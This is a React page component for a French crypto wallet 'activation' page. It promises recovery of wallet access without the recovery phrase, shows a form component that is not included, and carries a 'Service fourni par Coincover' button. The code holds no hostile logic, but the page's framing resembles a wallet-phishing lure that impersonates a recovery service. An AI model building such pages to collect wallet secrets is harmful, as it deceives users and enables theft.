// src/pages/ActivationPage.js
import React from 'react';
import { motion } from 'framer-motion';
import LogoBar from '../components/Logobar';
import ActivationForm from '../components/ActivationForm';
import Footer from '../components/Footer';
import './ActivationPage.css';

const fadeUp = {
  initial: { opacity: 0, y: 40 },
  animate: { opacity: 1, y: 0 },
  transition: { duration: 0.72, ease: [0.65, 0.05, 0.36, 1] }
};

const staggerContainer = {
  animate: {
    transition: {
      staggerChildren: 0.1
    }
  }
};

const ActivationPage = () => {
  const handleCoincoverClick = () => {
    window.open('https://www.coincover.com/', '_blank', 'noopener,noreferrer');
  };

  return (
    <div className="activation-page-container">
      {/* NAV BAR */}
      <motion.div 
        initial={{ opacity: 0, y: -20 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.6, ease: [0.65, 0.05, 0.36, 1] }}
      >
        <LogoBar />
      </motion.div>

      {/* HERO */}
      <motion.section 
        className="activation-hero"
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        transition={{ duration: 0.8, delay: 0.1 }}
      >
        <div className="hero-content">
          <motion.h1
            initial={{ opacity: 0, y: 30 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.7, delay: 0.2 }}
          >
            Ne perdez jamais l'accès à votre wallet
          </motion.h1>
          <motion.p
            initial={{ opacity: 0, y: 20 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.7, delay: 0.35 }}
          >
            Faites le choix de la sérénité.
            Restaurez l'accès à votre wallet, même si vous avez perdu votre phrase de récupération.
          </motion.p>
        </div>
      </motion.section>

      {/* FORMULAIRE */}
      <motion.div
        initial={{ opacity: 0, y: 30 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.7, delay: 0.5 }}
      >
        <ActivationForm />
      </motion.div>

      {/* BOUTON COINCOVER */}
      <motion.div 
        className="coincover-wrapper"
        style={{ textAlign: 'center', padding: '1rem 0' }}
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        transition={{ duration: 0.5, delay: 0.7 }}
      >
        <button
          className="coincover-button"
          onClick={handleCoincoverClick}
        >
          <span>🔒</span> Service fourni par Coincover
        </button>
      </motion.div>

      {/* SÉPARATEUR */}
      <motion.div
        initial={{ opacity: 0, scaleX: 0 }}
        animate={{ opacity: 1, scaleX: 1 }}
        transition={{ duration: 0.8, delay: 0.8 }}
      >
        <div className="activation-separator" />
      </motion.div>

      {/* FOOTER */}
      <motion.div
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        transition={{ duration: 0.6, delay: 0.9 }}
      >
        <Footer />
      </motion.div>
    </div>
  );
};

export default ActivationPage;